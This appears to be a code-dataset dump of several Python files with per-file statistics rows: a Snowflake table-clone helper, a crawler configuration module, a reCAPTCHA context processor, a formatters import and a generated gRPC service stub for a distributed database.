self._logger.error(self.log_message)
return False
finally:
# close connection and cursor
if self.connection:
self.connection.close()
if self.cursor:
self.cursor.close()
# log successful clone
self.log_message = f"Successfully cloned {source_table} into {self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table}"
self._logger.info(self.log_message)
return True
def clone_empty(self, new_table: str, source_table: str, database: str = None, schema: str = None,
source_database: str = None, source_schema: str = None, username: str = None,
password: str = None, account: str = None, role: str = None, warehouse: str = None):
"""method that creates an empty copy of a Snowflake table."""
try:
# initialize Snowflake connection and configure credentials
self.initialize_snowflake(
database=database,
schema=schema,
username=username,
password=password,
account=account,
role=role,
warehouse=warehouse
)
# build sql statement to be executed by the cursor object
if source_database and source_schema:
self.sql_statement = f"CREATE OR REPLACE TABLE {self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table} LIKE " \
f"{source_database}.{source_schema}.{source_table}"
elif source_schema and not source_database:
self.sql_statement = f"CREATE OR REPLACE TABLE {self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table} LIKE " \
f"{source_schema}.{source_table}"
elif not source_schema and not source_database:
self.sql_statement = f"CREATE OR REPLACE TABLE {self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table} LIKE " \
f"{source_table}"
else:
self.log_message = "Error: please call this method with viable values. Example: If you call this " \
"method with the 'source_database' parameter, " \
"you must include a 'source_schema' parameter as well"
self._logger.error(self.log_message)
return False
# execute sql statement
self.cursor = self.connection.cursor()
# use warehouse if not None
if self.sf_credentials['warehouse']:
self.cursor.execute(f"use warehouse {self.sf_credentials['warehouse']};")
self.cursor.execute(self.sql_statement)
# catch and log error
except Exception as e:
self.log_message = e
self._logger.error(self.log_message)
return False
finally:
# close connection and cursor
if self.connection:
self.connection.close()
if self.cursor:
self.cursor.close()
# log successful clone
self.log_message = f"Successfully cloned an empty version of {source_table} into " \
f"{self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table}"
self._logger.info(self.log_message)
return True
| 45.311594 | 150 | 0.577483 | 672 | 6,253 | 5.224702 | 0.145833 | 0.034178 | 0.096839 | 0.056964 | 0.89832 | 0.897465 | 0.888921 | 0.853033 | 0.853033 | 0.853033 | 0 | 0 | 0.335519 | 6,253 | 137 | 151 | 45.642336 | 0.845006 | 0.107149 | 0 | 0.782609 | 0 | 0.01087 | 0.279359 | 0.151657 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021739 | false | 0.043478 | 0.01087 | 0 | 0.119565 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8f7fdf55a41e103b5a8a9c3c19ea5c9617156ff0 | 418 | py | Python | crawler_dag/crawler/rojak_pantau/common/config.py | imrenagi/rojak-pantau | d8c28ed98b3b8493d8ef0d1ce60383c036e3ff05 | [
"MIT"
] | 1 | 2020-07-03T18:05:19.000Z | 2020-07-03T18:05:19.000Z | crawler_dag/crawler/rojak_pantau/common/config.py | imrenagi/rojak-pantau | d8c28ed98b3b8493d8ef0d1ce60383c036e3ff05 | [
"MIT"
] | 21 | 2017-10-09T07:15:30.000Z | 2017-10-23T19:06:38.000Z | crawler_dag/crawler/rojak_pantau/common/config.py | imrenagi/rojak-pantau | d8c28ed98b3b8493d8ef0d1ce60383c036e3ff05 | [
"MIT"
] | 4 | 2017-09-19T01:29:58.000Z | 2019-02-21T10:35:36.000Z | # -*- coding: utf-8 -*-
import os
def db_host():
return os.getenv('ROJAK_DB_HOST', 'rojak-crawler-db')
def db_port():
return int(os.getenv('ROJAK_DB_PORT', 3306))
def db_user():
return os.getenv('ROJAK_DB_USER', 'rojak')
def db_pass():
return os.getenv('ROJAK_DB_PASS', 'rojak')
def db_name():
return os.getenv('ROJAK_DB_NAME', 'crawler')
def slack_token():
return os.getenv('ROJAK_SLACK_TOKEN', '')
| 19.904762 | 55 | 0.684211 | 67 | 418 | 4 | 0.298507 | 0.179104 | 0.291045 | 0.354478 | 0.313433 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013774 | 0.131579 | 418 | 20 | 56 | 20.9 | 0.724518 | 0.050239 | 0 | 0 | 0 | 0 | 0.291139 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.461538 | true | 0.153846 | 0.076923 | 0.461538 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 7 |
712aefbb5d56f171ff91ca5c03090307ae9229a0 | 131 | py | Python | main_app/context_processors.py | Jonak-Adipta-Kalita/JAK-Website | 39c3723e95d99e990a2e23dbb05746def2ac903a | [
"MIT"
] | 1 | 2021-08-31T14:21:16.000Z | 2021-08-31T14:21:16.000Z | main_app/context_processors.py | Jonak-Adipta-Kalita/JAK-Website | 39c3723e95d99e990a2e23dbb05746def2ac903a | [
"MIT"
] | 74 | 2021-11-03T03:19:12.000Z | 2022-03-31T03:23:49.000Z | main_app/context_processors.py | Jonak-Adipta-Kalita/JAK-Website | 39c3723e95d99e990a2e23dbb05746def2ac903a | [
"MIT"
] | null | null | null | import credentials
def RECAPTCHA_CLIENT_KEY_Func(request):
return {"RECAPTCHA_CLIENT_KEY": credentials.RECAPTCHA_CLIENT_KEY}
| 21.833333 | 69 | 0.832061 | 16 | 131 | 6.375 | 0.5625 | 0.441176 | 0.529412 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099237 | 131 | 5 | 70 | 26.2 | 0.864407 | 0 | 0 | 0 | 0 | 0 | 0.152672 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 7 |
854fc6634523bc8389713e581bd11056c83c5ca0 | 134 | py | Python | nephthys/formatters/__init__.py | OvalMoney/horus | 90d839e9465f5089fa2632dad9f28190db3a829b | [
"MIT"
] | 2 | 2020-07-17T07:43:53.000Z | 2020-12-03T11:14:59.000Z | nephthys/formatters/__init__.py | OvalMoney/horus | 90d839e9465f5089fa2632dad9f28190db3a829b | [
"MIT"
] | 1 | 2020-01-27T15:49:33.000Z | 2020-01-27T15:49:33.000Z | nephthys/formatters/__init__.py | OvalMoney/horus | 90d839e9465f5089fa2632dad9f28190db3a829b | [
"MIT"
] | 2 | 2020-07-17T07:44:04.000Z | 2020-12-01T11:10:00.000Z | from .json import JSONFormatter as json_formatter # noqa: F401
from .pretty import PrettyFormatter as pretty_formatter # noqa: F401
| 44.666667 | 69 | 0.80597 | 18 | 134 | 5.888889 | 0.555556 | 0.245283 | 0.320755 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 0.149254 | 134 | 2 | 70 | 67 | 0.877193 | 0.156716 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
859169b76f1c51bf9ee3107d9bbb0e0630b45a73 | 30,538 | py | Python | net/net_pb2_grpc.py | XueQinliang/DDB_RPQL | da8c0047786543381e20e53e1ffe498646b450f7 | [
"MIT"
] | null | null | null | net/net_pb2_grpc.py | XueQinliang/DDB_RPQL | da8c0047786543381e20e53e1ffe498646b450f7 | [
"MIT"
] | null | null | null | net/net_pb2_grpc.py | XueQinliang/DDB_RPQL | da8c0047786543381e20e53e1ffe498646b450f7 | [
"MIT"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from net import net_pb2 as net_dot_net__pb2
class NetServiceStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Test = channel.unary_unary(
'/net.NetService/Test',
request_serializer=net_dot_net__pb2.Data.SerializeToString,
response_deserializer=net_dot_net__pb2.Data1.FromString,
)
self.Createtable = channel.unary_unary(
'/net.NetService/Createtable',
request_serializer=net_dot_net__pb2.SQL.SerializeToString,
response_deserializer=net_dot_net__pb2.Status.FromString,
)
self.Droptable = channel.unary_unary(
'/net.NetService/Droptable',
request_serializer=net_dot_net__pb2.SQL.SerializeToString,
response_deserializer=net_dot_net__pb2.Status.FromString,
)
self.Loaddata = channel.unary_unary(
'/net.NetService/Loaddata',
request_serializer=net_dot_net__pb2.LoadParams.SerializeToString,
response_deserializer=net_dot_net__pb2.Status.FromString,
)
self.Insertdata = channel.unary_unary(
'/net.NetService/Insertdata',
request_serializer=net_dot_net__pb2.LoadParams.SerializeToString,
response_deserializer=net_dot_net__pb2.DataReturn.FromString,
)
self.Deletedata = channel.unary_unary(
'/net.NetService/Deletedata',
request_serializer=net_dot_net__pb2.SQL.SerializeToString,
response_deserializer=net_dot_net__pb2.DataReturn.FromString,
)
self.SimpleSelect = channel.unary_unary(
'/net.NetService/SimpleSelect',
request_serializer=net_dot_net__pb2.SQL.SerializeToString,
response_deserializer=net_dot_net__pb2.SimpleSelectReturn.FromString,
)
self.Excute = channel.unary_unary(
'/net.NetService/Excute',
request_serializer=net_dot_net__pb2.SQLTree.SerializeToString,
response_deserializer=net_dot_net__pb2.TableData.FromString,
)
self.jr_grpc_test = channel.unary_unary(
'/net.NetService/jr_grpc_test',
request_serializer=net_dot_net__pb2.para_jr_grpc_test.SerializeToString,
response_deserializer=net_dot_net__pb2.ret_jr_grpc_test.FromString,
)
self.grpc_dfs = channel.unary_unary(
'/net.NetService/grpc_dfs',
request_serializer=net_dot_net__pb2.para_grpc_dfs.SerializeToString,
response_deserializer=net_dot_net__pb2.ret_grpc_dfs.FromString,
)
self.start_jr = channel.unary_unary(
'/net.NetService/start_jr',
request_serializer=net_dot_net__pb2.para_start_jr.SerializeToString,
response_deserializer=net_dot_net__pb2.ret_start_jr.FromString,
)
self.temp_GC = channel.unary_unary(
'/net.NetService/temp_GC',
request_serializer=net_dot_net__pb2.para_temp_GC.SerializeToString,
response_deserializer=net_dot_net__pb2.ret_temp_GC.FromString,
)
self.createdatabase = channel.unary_unary(
'/net.NetService/createdatabase',
request_serializer=net_dot_net__pb2.para_dbname.SerializeToString,
response_deserializer=net_dot_net__pb2.dbres.FromString,
)
self.dropdatabase1 = channel.unary_unary(
'/net.NetService/dropdatabase1',
request_serializer=net_dot_net__pb2.para_dbname.SerializeToString,
response_deserializer=net_dot_net__pb2.dbres.FromString,
)
self.dropdatabase2 = channel.unary_unary(
'/net.NetService/dropdatabase2',
request_serializer=net_dot_net__pb2.para_dbname.SerializeToString,
response_deserializer=net_dot_net__pb2.dbres.FromString,
)
self.dropdatabase3 = channel.unary_unary(
'/net.NetService/dropdatabase3',
request_serializer=net_dot_net__pb2.para_dbname.SerializeToString,
response_deserializer=net_dot_net__pb2.usedbres.FromString,
)
self.usedatabase1 = channel.unary_unary(
'/net.NetService/usedatabase1',
request_serializer=net_dot_net__pb2.para_dbname.SerializeToString,
response_deserializer=net_dot_net__pb2.dbres.FromString,
)
self.usedatabase2 = channel.unary_unary(
'/net.NetService/usedatabase2',
request_serializer=net_dot_net__pb2.para_dbname.SerializeToString,
response_deserializer=net_dot_net__pb2.dbres.FromString,
)
self.usedatabase3 = channel.unary_unary(
'/net.NetService/usedatabase3',
request_serializer=net_dot_net__pb2.para_dbname.SerializeToString,
response_deserializer=net_dot_net__pb2.usedbres.FromString,
)
self.jr_exit = channel.unary_unary(
'/net.NetService/jr_exit',
request_serializer=net_dot_net__pb2.para_jr_exit.SerializeToString,
response_deserializer=net_dot_net__pb2.ret_jr_exit.FromString,
)
class NetServiceServicer(object):
"""Missing associated documentation comment in .proto file."""
def Test(self, request, context):
"""test method
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Createtable(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Droptable(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Loaddata(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Insertdata(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Deletedata(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SimpleSelect(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Excute(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def jr_grpc_test(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def grpc_dfs(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def start_jr(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def temp_GC(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def createdatabase(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def dropdatabase1(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def dropdatabase2(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def dropdatabase3(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def usedatabase1(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def usedatabase2(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def usedatabase3(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def jr_exit(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_NetServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Test': grpc.unary_unary_rpc_method_handler(
servicer.Test,
request_deserializer=net_dot_net__pb2.Data.FromString,
response_serializer=net_dot_net__pb2.Data1.SerializeToString,
),
'Createtable': grpc.unary_unary_rpc_method_handler(
servicer.Createtable,
request_deserializer=net_dot_net__pb2.SQL.FromString,
response_serializer=net_dot_net__pb2.Status.SerializeToString,
),
'Droptable': grpc.unary_unary_rpc_method_handler(
servicer.Droptable,
request_deserializer=net_dot_net__pb2.SQL.FromString,
response_serializer=net_dot_net__pb2.Status.SerializeToString,
),
'Loaddata': grpc.unary_unary_rpc_method_handler(
servicer.Loaddata,
request_deserializer=net_dot_net__pb2.LoadParams.FromString,
response_serializer=net_dot_net__pb2.Status.SerializeToString,
),
'Insertdata': grpc.unary_unary_rpc_method_handler(
servicer.Insertdata,
request_deserializer=net_dot_net__pb2.LoadParams.FromString,
response_serializer=net_dot_net__pb2.DataReturn.SerializeToString,
),
'Deletedata': grpc.unary_unary_rpc_method_handler(
servicer.Deletedata,
request_deserializer=net_dot_net__pb2.SQL.FromString,
response_serializer=net_dot_net__pb2.DataReturn.SerializeToString,
),
'SimpleSelect': grpc.unary_unary_rpc_method_handler(
servicer.SimpleSelect,
request_deserializer=net_dot_net__pb2.SQL.FromString,
response_serializer=net_dot_net__pb2.SimpleSelectReturn.SerializeToString,
),
'Excute': grpc.unary_unary_rpc_method_handler(
servicer.Excute,
request_deserializer=net_dot_net__pb2.SQLTree.FromString,
response_serializer=net_dot_net__pb2.TableData.SerializeToString,
),
'jr_grpc_test': grpc.unary_unary_rpc_method_handler(
servicer.jr_grpc_test,
request_deserializer=net_dot_net__pb2.para_jr_grpc_test.FromString,
response_serializer=net_dot_net__pb2.ret_jr_grpc_test.SerializeToString,
),
'grpc_dfs': grpc.unary_unary_rpc_method_handler(
servicer.grpc_dfs,
request_deserializer=net_dot_net__pb2.para_grpc_dfs.FromString,
response_serializer=net_dot_net__pb2.ret_grpc_dfs.SerializeToString,
),
'start_jr': grpc.unary_unary_rpc_method_handler(
servicer.start_jr,
request_deserializer=net_dot_net__pb2.para_start_jr.FromString,
response_serializer=net_dot_net__pb2.ret_start_jr.SerializeToString,
),
'temp_GC': grpc.unary_unary_rpc_method_handler(
servicer.temp_GC,
request_deserializer=net_dot_net__pb2.para_temp_GC.FromString,
response_serializer=net_dot_net__pb2.ret_temp_GC.SerializeToString,
),
'createdatabase': grpc.unary_unary_rpc_method_handler(
servicer.createdatabase,
request_deserializer=net_dot_net__pb2.para_dbname.FromString,
response_serializer=net_dot_net__pb2.dbres.SerializeToString,
),
'dropdatabase1': grpc.unary_unary_rpc_method_handler(
servicer.dropdatabase1,
request_deserializer=net_dot_net__pb2.para_dbname.FromString,
response_serializer=net_dot_net__pb2.dbres.SerializeToString,
),
'dropdatabase2': grpc.unary_unary_rpc_method_handler(
servicer.dropdatabase2,
request_deserializer=net_dot_net__pb2.para_dbname.FromString,
response_serializer=net_dot_net__pb2.dbres.SerializeToString,
),
'dropdatabase3': grpc.unary_unary_rpc_method_handler(
servicer.dropdatabase3,
request_deserializer=net_dot_net__pb2.para_dbname.FromString,
response_serializer=net_dot_net__pb2.usedbres.SerializeToString,
),
'usedatabase1': grpc.unary_unary_rpc_method_handler(
servicer.usedatabase1,
request_deserializer=net_dot_net__pb2.para_dbname.FromString,
response_serializer=net_dot_net__pb2.dbres.SerializeToString,
),
'usedatabase2': grpc.unary_unary_rpc_method_handler(
servicer.usedatabase2,
request_deserializer=net_dot_net__pb2.para_dbname.FromString,
response_serializer=net_dot_net__pb2.dbres.SerializeToString,
),
'usedatabase3': grpc.unary_unary_rpc_method_handler(
servicer.usedatabase3,
request_deserializer=net_dot_net__pb2.para_dbname.FromString,
response_serializer=net_dot_net__pb2.usedbres.SerializeToString,
),
'jr_exit': grpc.unary_unary_rpc_method_handler(
servicer.jr_exit,
request_deserializer=net_dot_net__pb2.para_jr_exit.FromString,
response_serializer=net_dot_net__pb2.ret_jr_exit.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'net.NetService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class NetService(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def Test(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/Test',
net_dot_net__pb2.Data.SerializeToString,
net_dot_net__pb2.Data1.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Createtable(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/Createtable',
net_dot_net__pb2.SQL.SerializeToString,
net_dot_net__pb2.Status.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Droptable(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/Droptable',
net_dot_net__pb2.SQL.SerializeToString,
net_dot_net__pb2.Status.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Loaddata(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/Loaddata',
net_dot_net__pb2.LoadParams.SerializeToString,
net_dot_net__pb2.Status.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Insertdata(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/Insertdata',
net_dot_net__pb2.LoadParams.SerializeToString,
net_dot_net__pb2.DataReturn.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Deletedata(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/Deletedata',
net_dot_net__pb2.SQL.SerializeToString,
net_dot_net__pb2.DataReturn.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SimpleSelect(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/SimpleSelect',
net_dot_net__pb2.SQL.SerializeToString,
net_dot_net__pb2.SimpleSelectReturn.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Excute(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/Excute',
net_dot_net__pb2.SQLTree.SerializeToString,
net_dot_net__pb2.TableData.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def jr_grpc_test(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/jr_grpc_test',
net_dot_net__pb2.para_jr_grpc_test.SerializeToString,
net_dot_net__pb2.ret_jr_grpc_test.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def grpc_dfs(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/grpc_dfs',
net_dot_net__pb2.para_grpc_dfs.SerializeToString,
net_dot_net__pb2.ret_grpc_dfs.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def start_jr(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/start_jr',
net_dot_net__pb2.para_start_jr.SerializeToString,
net_dot_net__pb2.ret_start_jr.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def temp_GC(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/temp_GC',
net_dot_net__pb2.para_temp_GC.SerializeToString,
net_dot_net__pb2.ret_temp_GC.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def createdatabase(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/createdatabase',
net_dot_net__pb2.para_dbname.SerializeToString,
net_dot_net__pb2.dbres.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def dropdatabase1(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/dropdatabase1',
net_dot_net__pb2.para_dbname.SerializeToString,
net_dot_net__pb2.dbres.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def dropdatabase2(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/dropdatabase2',
net_dot_net__pb2.para_dbname.SerializeToString,
net_dot_net__pb2.dbres.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def dropdatabase3(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/dropdatabase3',
net_dot_net__pb2.para_dbname.SerializeToString,
net_dot_net__pb2.usedbres.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def usedatabase1(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/usedatabase1',
net_dot_net__pb2.para_dbname.SerializeToString,
net_dot_net__pb2.dbres.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def usedatabase2(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/usedatabase2',
net_dot_net__pb2.para_dbname.SerializeToString,
net_dot_net__pb2.dbres.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def usedatabase3(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/usedatabase3',
net_dot_net__pb2.para_dbname.SerializeToString,
net_dot_net__pb2.usedbres.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def jr_exit(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/jr_exit',
net_dot_net__pb2.para_jr_exit.SerializeToString,
net_dot_net__pb2.ret_jr_exit.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 43.939568 | 95 | 0.639728 | 2,953 | 30,538 | 6.265831 | 0.04233 | 0.039561 | 0.058855 | 0.078474 | 0.893261 | 0.862509 | 0.843052 | 0.783386 | 0.730044 | 0.702967 | 0 | 0.007634 | 0.283647 | 30,538 | 694 | 96 | 44.002882 | 0.838179 | 0.049283 | 0 | 0.645425 | 1 | 0 | 0.075378 | 0.034694 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068627 | false | 0 | 0.003268 | 0.03268 | 0.109477 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
